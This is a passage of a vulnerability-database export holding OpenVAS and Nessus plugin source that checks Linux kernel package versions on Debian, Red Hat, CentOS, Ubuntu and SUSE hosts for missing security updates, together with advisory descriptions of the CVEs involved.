ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-manual-3.2\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-source-3.2\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-support-3.2.0-4\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-3.2.0-4-686-pae\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-3.2.0-4-amd64\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7822"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2015-02-11T00:00:00", "id": "OPENVAS:1361412562310871312", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871312", "type": "openvas", "title": "RedHat Update for kernel RHSA-2015:0164-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for kernel RHSA-2015:0164-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871312\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-02-11 05:39:17 +0100 (Wed, 11 Feb 2015)\");\n script_cve_id(\"CVE-2014-7822\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Update for kernel RHSA-2015:0164-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n * A flaw was found in the way the Linux kernel's splice() system call\nvalidated its parameters. On certain file systems, a local, unprivileged\nuser could use this flaw to write past the maximum file size, and thus\ncrash the system. (CVE-2014-7822, Moderate)\n\nRed Hat would like to thank Akira Fujita of NEC for reporting this issue.\n\nThis update also fixes the following bugs:\n\n * Previously, hot-unplugging of a virtio-blk device could in some cases\nlead to a kernel panic, for example during in-flight I/O requests.\nThis update fixes race condition in the hot-unplug code in the\nvirtio_blk.ko module. As a result, hot unplugging of the virtio-blk device\nno longer causes the guest kernel oops when there are in-flight I/O\nrequests. (BZ#1006536)\n\n * Before this update, due to a bug in the error-handling path, a corrupted\nmetadata block could be used as a valid block. With this update, the error\nhandling path has been fixed and more checks have been added to verify the\nmetadata block. Now, when a corrupted metadata block is encountered, it is\nproperly marked as corrupted and handled accordingly. (BZ#1034403)\n\n * Previously, an incorrectly initialized variable resulted in a random\nvalue being stored in the variable that holds the number of default ACLs,\nand is sent in the SET_PATH_INFO data structure. Consequently, the setfacl\ncommand could, under certain circumstances, fail with an 'Invalid argument'\nerror. With this update, the variable is correctly initialized to zero,\nthus fixing the bug. (BZ#1105625)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\");\n script_tag(name:\"affected\", value:\"kernel on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:0164-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-February/msg00016.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~402.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7822"], "description": "Check the version of kernel", "modified": "2019-03-08T00:00:00", "published": "2015-02-12T00:00:00", "id": "OPENVAS:1361412562310882118", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882118", "type": "openvas", "title": "CentOS Update for kernel CESA-2015:0164 centos5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2015:0164 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882118\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-02-12 05:28:11 +0100 (Thu, 12 Feb 2015)\");\n script_cve_id(\"CVE-2014-7822\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for kernel CESA-2015:0164 centos5\");\n script_tag(name:\"summary\", value:\"Check the version of kernel\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n * A flaw was found in the way the Linux kernel's splice() system call\nvalidated its parameters. On certain file systems, a local, unprivileged\nuser could use this flaw to write past the maximum file size, and thus\ncrash the system. (CVE-2014-7822, Moderate)\n\nRed Hat would like to thank Akira Fujita of NEC for reporting this issue.\n\nThis update also fixes the following bugs:\n\n * Previously, hot-unplugging of a virtio-blk device could in some cases\nlead to a kernel panic, for example during in-flight I/O requests.\nThis update fixes race condition in the hot-unplug code in the\nvirtio_blk.ko module. As a result, hot unplugging of the virtio-blk device\nno longer causes the guest kernel oops when there are in-flight I/O\nrequests. (BZ#1006536)\n\n * Before this update, due to a bug in the error-handling path, a corrupted\nmetadata block could be used as a valid block. With this update, the error\nhandling path has been fixed and more checks have been added to verify the\nmetadata block. Now, when a corrupted metadata block is encountered, it is\nproperly marked as corrupted and handled accordingly. (BZ#1034403)\n\n * Previously, an incorrectly initialized variable resulted in a random\nvalue being stored in the variable that holds the number of default ACLs,\nand is sent in the SET_PATH_INFO data structure. Consequently, the setfacl\ncommand could, under certain circumstances, fail with an 'Invalid argument'\nerror. With this update, the variable is correctly initialized to zero,\nthus fixing the bug. (BZ#1105625)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\");\n script_tag(name:\"affected\", value:\"kernel on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:0164\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-February/020932.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~402.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~402.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~402.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~402.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~402.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~402.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~402.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~402.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~402.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~402.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-20T15:28:45", "description": "The Linux kernel's splice system call did not correctly validate its\nparameters. A local, unprivileged user could exploit this flaw to\ncause a denial of service (system crash). (CVE-2014-7822)\n\nA flaw was discovered in how Thread Local Storage (TLS) is handled by\nthe task switching function in the Linux kernel for x86_64 based\nmachines. A local user could exploit this flaw to bypass the Address\nSpace Layout Radomization (ASLR) protection mechanism. (CVE-2014-9419)\n\nDmitry Chernenkov discovered a buffer overflow in eCryptfs' encrypted\nfile name decoding. A local unprivileged user could exploit this flaw\nto cause a denial of service (system crash) or potentially gain\nadministrative privileges. (CVE-2014-9683)\n\nSun Baoliang discovered a use after free flaw in the Linux kernel's\nSCTP (Stream Control Transmission Protocol) subsystem during INIT\ncollisions. A remote attacker could exploit this flaw to cause a\ndenial of service (system crash) or potentially escalate their\nprivileges on the system. (CVE-2015-1421).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2015-03-25T00:00:00", "title": "Ubuntu 12.04 LTS : linux vulnerabilities (USN-2541-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7822", "CVE-2015-1421", "CVE-2014-9683", "CVE-2014-9419"], "modified": "2015-03-25T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-2541-1.NASL", "href": "https://www.tenable.com/plugins/nessus/82069", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2541-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82069);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-7822\", \"CVE-2014-9419\", \"CVE-2014-9683\", \"CVE-2015-1421\");\n script_bugtraq_id(71794, 72356, 72643);\n script_xref(name:\"USN\", value:\"2541-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux vulnerabilities (USN-2541-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Linux kernel's splice system call did not correctly validate its\nparameters. A local, unprivileged user could exploit this flaw to\ncause a denial of service (system crash). (CVE-2014-7822)\n\nA flaw was discovered in how Thread Local Storage (TLS) is handled by\nthe task switching function in the Linux kernel for x86_64 based\nmachines. A local user could exploit this flaw to bypass the Address\nSpace Layout Radomization (ASLR) protection mechanism. (CVE-2014-9419)\n\nDmitry Chernenkov discovered a buffer overflow in eCryptfs' encrypted\nfile name decoding. A local unprivileged user could exploit this flaw\nto cause a denial of service (system crash) or potentially gain\nadministrative privileges. (CVE-2014-9683)\n\nSun Baoliang discovered a use after free flaw in the Linux kernel's\nSCTP (Stream Control Transmission Protocol) subsystem during INIT\ncollisions. A remote attacker could exploit this flaw to cause a\ndenial of service (system crash) or potentially escalate their\nprivileges on the system. (CVE-2015-1421).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2541-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2020 Canonical, Inc. / NASL script (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2014-7822\", \"CVE-2014-9419\", \"CVE-2014-9683\", \"CVE-2015-1421\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2541-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-79-generic\", pkgver:\"3.2.0-79.115\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-79-generic-pae\", pkgver:\"3.2.0-79.115\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-79-highbank\", pkgver:\"3.2.0-79.115\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-79-virtual\", pkgver:\"3.2.0-79.115\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.2-generic / linux-image-3.2-generic-pae / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:22:52", "description": "The SUSE Linux Enterprise 12 kernel was updated to 3.12.44 to receive\nvarious security and bugfixes.\n\nThese features were added :\n\n - mpt2sas: Added Reply Descriptor Post Queue (RDPQ) Array\n support (bsc#854824).\n\n - mpt3sas: Bump mpt3sas driver version to 04.100.00.00\n (bsc#854817).\n\nFollowing security bugs were fixed :\n\n - CVE-2015-1805: iov overrun for failed atomic copy could\n have lead to DoS or privilege escalation (bsc#933429).\n\n - CVE-2015-3212: A race condition in the way the Linux\n kernel handled lists of associations in SCTP sockets\n could have lead to list corruption and kernel panics\n (bsc#936502).\n\n - CVE-2015-4036: DoS via memory corruption in vhost/scsi\n driver (bsc#931988).\n\n - CVE-2015-4167: Linux kernel built with the UDF file\n system(CONFIG_UDF_FS) support was vulnerable to a crash.\n It occurred while fetching inode information from a\n corrupted/malicious udf file system image (bsc#933907).\n\n - CVE-2015-4692: DoS via NULL pointer dereference in\n kvm_apic_has_events function (bsc#935542).\n\n - CVE-2015-5364: Remote DoS via flood of UDP packets with\n invalid checksums (bsc#936831).\n\n - CVE-2015-5366: Remote DoS of EPOLLET epoll applications\n via flood of UDP packets with invalid checksums\n (bsc#936831).\n\nSecurity issues already fixed in the previous update but not\nreferenced by CVE :\n\n - CVE-2014-9728: Kernel built with the UDF file\n system(CONFIG_UDF_FS) support were vulnerable to a crash\n (bsc#933904).\n\n - CVE-2014-9729: Kernel built with the UDF file\n system(CONFIG_UDF_FS) support were vulnerable to a crash\n (bsc#933904).\n\n - CVE-2014-9730: Kernel built with the UDF file\n system(CONFIG_UDF_FS) support were vulnerable to a crash\n (bsc#933904).\n\n - CVE-2014-9731: Kernel built with the UDF file\n system(CONFIG_UDF_FS) support were vulnerable to\n information leakage (bsc#933896).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "published": "2015-08-03T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : SUSE Linux Enterprise 12 kernel (SUSE-SU-2015:1324-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4692", "CVE-2015-5364", "CVE-2014-9728", "CVE-2014-9730", "CVE-2015-5366", "CVE-2014-9729", "CVE-2015-3212", "CVE-2015-4167", "CVE-2014-9731", "CVE-2015-4036", "CVE-2015-1805"], "modified": "2015-08-03T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debugsource", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-devel"], "id": "SUSE_SU-2015-1324-1.NASL", "href": "https://www.tenable.com/plugins/nessus/85180", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:1324-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85180);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-9728\", \"CVE-2014-9729\", \"CVE-2014-9730\", \"CVE-2014-9731\", \"CVE-2015-1805\", \"CVE-2015-3212\", \"CVE-2015-4036\", \"CVE-2015-4167\", \"CVE-2015-4692\", \"CVE-2015-5364\", \"CVE-2015-5366\");\n script_bugtraq_id(74664, 74951, 74963, 74964, 75001, 75142, 75510);\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : SUSE Linux Enterprise 12 kernel (SUSE-SU-2015:1324-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 kernel was updated to 3.12.44 to receive\nvarious security and bugfixes.\n\nThese features were added :\n\n - mpt2sas: Added Reply Descriptor Post Queue (RDPQ) Array\n support (bsc#854824).\n\n - mpt3sas: Bump mpt3sas driver version to 04.100.00.00\n (bsc#854817).\n\nFollowing security bugs were fixed :\n\n - CVE-2015-1805: iov overrun for failed atomic copy could\n have lead to DoS or privilege escalation (bsc#933429).\n\n - CVE-2015-3212: A race condition in the way the Linux\n kernel handled lists of associations in SCTP sockets\n could have lead to list corruption and kernel panics\n (bsc#936502).\n\n - CVE-2015-4036: DoS via memory corruption in vhost/scsi\n driver (bsc#931988).\n\n - CVE-2015-4167: Linux kernel built with the UDF file\n system(CONFIG_UDF_FS) support was vulnerable to a crash.\n It occurred while fetching inode information from a\n corrupted/malicious udf file system image (bsc#933907).\n\n - CVE-2015-4692: DoS via NULL pointer dereference in\n kvm_apic_has_events function (bsc#935542).\n\n - CVE-2015-5364: Remote DoS via flood of UDP packets with\n invalid checksums (bsc#936831).\n\n - CVE-2015-5366: Remote DoS of EPOLLET epoll applications\n via flood of UDP packets with invalid checksums\n (bsc#936831).\n\nSecurity issues already fixed in the previous update but not\nreferenced by CVE :\n\n - CVE-2014-9728: Kernel built with the UDF file\n system(CONFIG_UDF_FS) support were vulnerable to a crash\n 